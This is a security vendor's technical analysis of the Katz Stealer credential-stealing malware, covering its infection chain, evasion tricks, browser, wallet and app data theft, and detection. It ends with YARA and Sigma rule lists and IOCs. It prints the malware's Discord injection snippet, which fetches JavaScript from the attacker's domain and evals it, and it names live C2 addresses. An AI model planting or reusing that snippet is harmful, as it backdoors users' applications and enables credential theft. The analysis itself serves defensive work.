In this analysis, we will delve into the technical details of Katz Stealer, a credential-stealing malware as a service. We will explore its infection chain and the various techniques it employs to evade detection and exfiltrate sensitive data. We will also discuss detection opportunities and include YARA and Sigma rules to help identify this threat.

Katz Stealer is a multi-feature stealer that conducts broad system reconnaissance and data theft by:

• Targeting popular web browsers (Chrome, Edge, Brave, Firefox) to extract saved passwords, cookies, and session tokens.
• Scanning for wallet apps, browser extensions, and searching the file system for wallet files, seed phrases, and private keys via keyword matching.
• Compromising communication platforms such as Discord (via process hijacking), Telegram, and other apps like Slack, Signal, Teams, etc.
• Extracting email data from Outlook (PST/OST files, caches), Windows Live Mail, and regional clients like Foxmail.
• Targeting gamers by stealing Steam credentials, configuration files, and stored payment methods.
• Exploiting network and system data, including WiFi credentials (via netsh), VPN setups, FTP client credentials, and Ngrok tokens.
• Employing surveillance tools like screen capture, clipboard monitoring, and system profiling.

To evade detection, the malware utilizes a range of evasion techniques, including:

• Geofencing.
• Virtual machine detection.
• Sandbox evasion via screen resolution and system uptime analysis.
• Anti-forensic memory wiping.
• Process hollowing for DLL injection.
• Abusing legitimate Windows utilities (e.g., cmstp.exe).
• Compromising trusted Electron-based applications (e.g., Discord, Telegram).

Infection Chain

Katz Stealer spreads through everyday online activities—phishing emails, fake software downloads, malicious ads, or search results manipulated by threat actors. In a typical infection chain, attackers conceal malicious JavaScript in gzip files, which, when opened, trigger the download of a PowerShell script. This script retrieves a .NET-based loader payload, which injects the stealer into a legitimate process. Once active, it exfiltrates stolen data to the command and control server.

Technical analysis

After extracting the initial gzip file, we can see heavily obfuscated JavaScript code. This code is responsible for downloading the second stage — an obfuscated and base64-encoded PowerShell script.

The second stage is executed through PowerShell using the typical hidden window flags. If we decode the base64 string, we can see that the script is responsible for downloading another payload from the internet.

The script downloads a seemingly harmless image file from the well-known archive.org, but secretly scans it for hidden code embedded between the markers <<base64_start>> and <<base64_end>>. This technique helps the malware evade detection by concealing its payload within benign-looking content. We have already added detection for this technique in our YARA rules. You can find the YARA rule and similar payloads here.

The script extracts the hidden base64-encoded code, decodes it, and executes it directly in memory using .NET Reflection—bypassing disk writes entirely. The extracted .NET binary is obfuscated and responsible for downloading the final payload from pub-ce02802067934e0eb072f69bf6427bf6.r2.dev a temporary Cloudflare-hosted domain. Before proceeding, it performs basic checks to detect virtual machines or sandbox environments. Once downloaded, the payload is injected into a legitimate process via Process Hollowing, in this case the MSBuild process.

The .NET payload also includes a UAC bypass abusing cmstp.exe, which is a legitimate Windows utility for installing and configuring connection manager profiles. This technique allows the malware to run with elevated privileges without triggering User Account Control (UAC) prompts. The UAC bypass is used to run the injection target (MSBuild) with elevated privileges.

An open-source Sigma rule detecting this technique is available here.

Geofencing & Regional Targeting

The malware implements a geofencing mechanism that prevents execution on systems in specific regions, primarily in Commonwealth of Independent States (CIS) countries.

Upon execution, the malware performs the following checks:

1. Country Code Comparison: It gets the country code from both the user’s locale and keyboard layout using the GetLocaleInfoA and GetKeyboardLayout API functions.
2. System Language Check: The malware uses GetSystemDefaultLangID to check the system’s default UI language.

If any of the checks match the hardcoded values for CIS countries like Russia, the malware terminates its execution. This is a common tactic used by malware authors to avoid detection and analysis in regions where they expect heightened scrutiny or law enforcement activity.

The following figure shows the countries where the malware avoids execution:

Virtual Machine Detection

The malware also implements a series of checks to determine if it is running in a virtual machine (VM) or sandbox environment. It queries the system BIOS information through registry key HKLM\HARDWARE\DESCRIPTION\System\BIOS to identify common virtualization platforms.

If initial VM checks are inconclusive, the malware performs additional system environment analysis:

• Screen Resolution Analysis
  • Flags systems with resolution ≤1024×768 as potential analysis environments
• System Uptime Check
  • Uses GetTickCount64() to identify recently started systems
  • Flags systems with uptime < 10 minutes as suspicious

Upon detecting a virtual or analysis environment, the malware alters its behavior to evade detection and analysis. This may include terminating execution or modifying its operational patterns.

The Main Payload

The payload injected into MSBuild opens a persistent TCP connection to its command and control server at 185.107.74.40. It identifies itself with the unique ID “al3rbi” and includes a retry loop that attempts to reconnect every 5 seconds if the connection drops. After establishing the connection, the malware downloads another payload, saving it as “received_dll.dll” in the system’s temp folder.

Next it searches the system for the following browsers:

• Microsoft Edge
• Brave Browser
• Google Chrome

Once a supported browser is detected, the malware sets up the environment and launches it in headless mode, waiting 1.5 seconds to ensure it fully initializes. It then injects the downloaded DLL into the browser process using the CreateRemoteThread API, allowing it to run code within the context of that process. The injected DLL allows the malware to operate from within legitimate browser processes, helping it to gain privileges and remain hidden while harvesting sensitive data.

Bypassing Chrome’s App-Bound Encryption

Once the injection is complete, the malware calls the exported SetBrowserType function from the injected DLL internally named app_bound.dll to start harvesting credentials. First it locates the Application Data folder, then searches for the Local State files that contain the decrypted encryption keys for Chrome, Edge, and Brave and are crucial for unlocking stored passwords, cookies, and authentication tokens.

The malware initializes COM in Single-Threaded Apartment (STA) mode to ensure compatibility with privileged Windows COM interfaces. This allows it to create an IElevator object for the browser process, granting elevated access for file operations.

Using this access, the malware retrieves the Local State file from the browser’s user data directory. This file contains the master encryption key used to secure sensitive data like passwords and cookies. The malware stores the stolen decryption keys as plain text files in the victim’s AppData folder, using names like “decrypted\_chrome\_key.txt”. It generates a separate file for each targeted browser: Brave, Chrome, and Edge.

The code shows great similarity to this open-source tool showcasing decryption of app-bound encrypted cookies and passwords from Chromium-based browsers. This modified version of the original tool includes the same changes we see in Katz Stealer, like saving the decrypted keys as txt files to the AppData folder.

Firefox/Gecko Multi-Version Profile Targeting

In addition to targeting Chrome, the malware also attacks Firefox and other Gecko-based browsers. It begins by locating the AppData folder and scanning for any installed Gecko browsers. For each one found, it searches for the profiles.ini file, which points to the locations of user profiles.

Once a profile is identified, the malware attempts to extract six key files containing sensitive data:

• cookies.sqlite – stores active login sessions
• logins.json – contains saved usernames and passwords
• key4.db / key3.db – used to decrypt protected data such as passwords
• formhistory.sqlite – holds saved form input, often containing personal information
• places.sqlite – includes browsing history and bookmarks

These files are then collected and prepared for exfiltration.

Discord Process Hijacking & Remote Code Execution

The malware hijacks Discord by locating its installation folder, identifying the latest version through “app-” directories, and modifying the index.js file inside app.asar. The app.asar contains the bundled JavaScript code for the Electron based Discord client, and the malware injects its own code into this file to execute malicious actions.

require('https').request({
hostname: '[twist2katz.com](./img/http://twist2katz.com/)',
path: '/api/getapicn?key=%s',
headers: {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop'
}
}, r => {
let d = '';
r.on('data', c => d += c);
r.on('end', () => eval(d));
}).end();

module.exports = require("./core.asar");

The malicious code connects to twist2katz.com over HTTPS using a spoofed Chrome User-Agent with “katz-ontop” appended. It then executes remote JavaScript payloads within Discord’s process, establishing a persistent backdoor that enables dynamic code execution and access to sensitive data while keeping the app fully functional to avoid detection.

Crypto Wallet Exfiltration

Katz Stealer does not only target browser credentials but also cryptocurrency wallets. It scans the system for a wide range of popular cryptocurrency wallets:

• Exodus
• Bitcoin Core
• Litecoin
• Dogecoin
• Dash
• Electrum
• Ethereum
• Coinomi
• Daedalus
• Monero
• Wasabi
• Ravencoin

For each targeted wallet, the malware attempts to locate the wallet files, which may be stored in various formats depending on the wallet type. The malware uses a combination of file extensions and keywords to identify relevant files. It then copies all extracted data like private keys to a temporary directory for exfiltration.

In some cases, the malware will recursively copy entire wallet directories to ensure it captures all relevant files. Once the collection phase is complete, the stolen data is immediately uploaded to a remote server controlled by the attackers. Following successful exfiltration, the malware deletes the temporary folder to erase traces of its activity.

In addition to standalone wallet apps, Katz Stealer also targets cryptocurrency browser extensions, containing 154 extension IDs linked to popular wallets. It specifically includes support for exfiltrating wallet data from the Brave Browser, which differs from typical extension-based wallets by storing its built-in wallet separately on the system.

For traditional browser-based wallets, the malware navigates through their storage directories, identifies sensitive files, and copies them to its temporary working directory using a structured naming format: BrowserName/ProfileName/ExtensionID/filename.

More Data Exfiltration

The malware also targets a wide range of additional applications and data types, which we won’t detail here due to the extensive existing coverage on typical stealer behavior. These include:

• Common Email Clients: It scans for email clients like Foxmail, Outlook, and Windows Live Mail, extracting configuration files and cached credentials.
• Gaming Platforms: It targets gaming platforms like Steam, extracting credentials, games and configuration files.
• FTP Clients: The malware searches for FTP client software and extracts saved credentials, allowing attackers to access remote servers.
• VPN Configuration: It collects VPN configuration files from various providers, including NordVPN, OpenVPN, etc. extracting authentication credentials and connection profiles.
• Messaging Applications: The malware targets popular messaging applications like Discord, Slack, Signal, and Microsoft Teams, extracting authentication tokens and chat databases.
• Cryptographic Keys: It searches for private key formats and seed phrases associated with various cryptocurrencies.
• Wifi Credentials: The malware uses the netsh command to extract saved WiFi credentials, including SSIDs and passwords, from the system.
• Ngrok Tokens: It searches for Ngrok configuration files, specifically ngrok.yml, which contains authentication tokens and other sensitive information.

Additional Capabilities

The malware gathers basic information from the infected system, including:

• System information (OS version, architecture, CPU, RAM)
• IP address and geolocation data

This information is sent to the command and control server, providing attackers with a comprehensive overview of the compromised system.

Screen Capture

Katz Stealer can take screenshots of the victim’s screen. When the C2 server sends a command to capture the screen, the malware uses the BitBlt function to take a screenshot of the entire screen and save it as a bitmap file. The captured image is then sent back to the C2 server, allowing the attacker to monitor the activity of the victim and gather further sensitive information.

Clipboard Monitoring

Another feature of Katz Stealer is its ability to monitor the system clipboard. When a command from the C2 is received it captures the current contents of the clipboard and sends them to the C2 server.

Detection Opportunities

The malware employs a variety of techniques to evade detection, including geofencing, virtual machine detection, and process hollowing. However, there are still several opportunities for detection:

1. Network Traffic Analysis:
   • Monitor for unusual outbound connections to known C2 servers or suspicious domains. The malware uses a specific User-Agent string that can be flagged.
2. File System Indicators:
   • We can check for the creation/presence of temporary files in unusual locations, especially those with names like “received_dll.dll” or “katz_ontop.dll”, which are highly indicative of Katz Stealer activity. All relevant file names are listed in the IOCs section.
3. Process Analysis:
   • The malware abuses legitimate system utilities like cmstp.exe to bypass UAC. Monitoring for unusual command-line arguments or process creation events related to cmstp.exe can help identify this behavior.
   • Katz Stealer spawns known processes like MSBuild.exe and injects its payload into them. Monitoring for unusual process creation or injection activity can help identify the malware.
   • Another indicator is the use of chromium-based browsers in headless mode. Monitoring for unusual command-line arguments or process creation events related to headless browser execution can help identify this behavior.
   • The scanning for registry keys and files associated with popular browsers and wallet applications can also be indicative of Katz Stealer activity.

We have linked all relevant open-source Sigma and YARA rules below to help you detect Katz Stealer and similar threats.

You can scan your system now using our free scanners: THOR Cloud Lite or THOR Lite. Both scanners can detect Katz Stealer and other threats.

THOR Cloud Lite is our new cloud-based scanner that requires no installation, simply register for a free account, download the scanner, run it, and view the results directly in your web browser.

For enterprise users, we recommend THOR, our fully featured compromise assessment and forensic scanner. It includes our complete detection capabilities, powered by over 20,000 handcrafted YARA and Sigma rules. THOR is available for Windows, Linux, and macOS.

YARA rules

The following YARA rules can be used to detect Katz Stealer and components from its infection chain. The rules are available in our GitHub repository or automatically included in our scanners.

Rule Name	Description
MAL_Katz_Stealer_May25	Detects Katz Stealer
MAL_DLL_Chrome_App_Bound_Encryption_Decryption_May25	Detects a DLL used to decrypt App-Bound Encrypted (ABE) cookies, passwords & payment methods from Chromium-based browsers. seen being used by Katz stealer
SUSP_Katz_Stealer_Log_May25	Detects log file that contains system reconnaissance data, seen being generated by Katz stealer
MAL_NET_Katz_Stealer_May25	Detects .NET based Katz stealer loader
MAL_NET_UAC_Bypass_May25	Detects .NET based tool abusing legitimate Windows utility cmstp.exe to bypass UAC (User-Admin-Controls)

Sigma Rules

Rule	Description
dns_query_win_katz_stealer_domain	Detects DNS queries to domains associated with Katz Stealer malware
image_load_win_katz_stealer_payloads	Detects loading of DLLs associated with Katz Stealer malware 2025 variants
zeek_dns_katz_stealer_domain	Detects DNS queries to domains associated with Katz Stealer malware
zeek_http_katz_stealer_susp_useragent	Detects network connections with suspicious User-Agent string containing “katz-ontop”, which may indicate Katz Stealer activity
file_access_win_susp_process_access_browser_cred_files	Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts
proc_creation_win_uac_bypass_cmstp	Detects the use of cmstp.exe to bypass UAC
proc_creation_win_msbuild_susp_parent_process	Detects suspicious execution of ‘Msbuild.exe’ by a uncommon parent process
proc_creation_win_registry_enumeration_for_credentials_cli	Detects processes that query known 3rd party registry keys that hold credentials via commandline
proc_creation_win_browsers_chromium_headless_exec	Detects execution of Chromium based browser in headless mode

IOCs

C2 Addresses:

185.107.74[.]40
31.177.109[.]39
twist2katz[.]com
pub-ce02802067934e0eb072f69bf6427bf6[.]r2[.]dev

Related Domains:

katz-stealer[.]com
katzstealer[.]com

User-Agent:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop

Filenames:

\AppData\Local\Temp\katz_ontop.dll
\AppData\Local\Temp\received_dll.dll
\AppData\Roaming\decrypted_chrome_key.txt
\AppData\Roaming\decrypted_brave_key.txt
\AppData\Roaming\decrypted_edge_key.txt

Payloads:

File	SHA256
Gzip Archive	22af84327cb8ecafa44b51e9499238ca2798cec38c2076b702c60c72505329cb
JS Script	e4249cf9557799e8123e0b21b6a4be5ab8b67d56dc5bfad34a1d4e76f7fd2b19
PowerShell script	fb2b9163e8edf104b603030cff2dc62fe23d8f158dd90ea483642fce2ceda027
.NET Payload	0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7
.NET UAC Bypass	4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7
katz_ontop.dll	6dc8e99da68b703e86fa90a8794add87614f254f804a8d5d65927e0676107a9d
katz_ontop.dll	e73f6e1f6c28469e14a88a633aef1bc502d2dbb1d4d2dfcaaef7409b8ce6dc99
received_dll.dll	15953e0191edaa246045dda0d7489b3832f27fdc3fcc5027f26b89692aefd6e1
Stealer Payload	2798bf4fd8e2bc591f656fa107bd871451574d543882ddec3020417964d2faa9
Stealer Payload	e345d793477abbecc2c455c8c76a925c0dfe99ec4c65b7c353e8a8c8b14da2b6
Stealer Payload	c601721933d11254ae329b05882337db1069f81e4d04cd4550c4b4b4fe35f9cd
Stealer Payload	fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789
Stealer Payload	25b1ec4d62c67bd51b43de181e0f7d1bda389345b8c290e35f93ccb444a2cf7a
Stealer Payload	964ec70fc2fdf23f928f78c8af63ce50aff058b05787e43c034e04ea6cbe30ef
Stealer Payload	d92bb6e47cb0a0bdbb51403528ccfe643a9329476af53b5a729f04a4d2139647
Stealer Payload	b249814a74dff9316dc29b670e1d8ed80eb941b507e206ca0dfdc4ff033b1c1f
Stealer Payload	925e6375deaa38d978e00a73f9353a9d0df81f023ab85cf9a1dc046e403830a8
Stealer Payload	96ada593d54949707437fa39628960b1c5d142a5b1cb371339acc8f86dbc7678
Stealer Payload	b912f06cf65233b9767953ccf4e60a1a7c262ae54506b311c65f411db6f70128
Stealer Payload	2852770f459c0c6a0ecfc450b29201bd348a55fb3a7a5ecdcc9986127fdb786b
Stealer Payload	5dd629b610aee4ed7777e81fc5135d20f59e43b5d9cc55cdad291fcf4b9d20eb

Authors

• Jonathan Peters
• Gameel Ali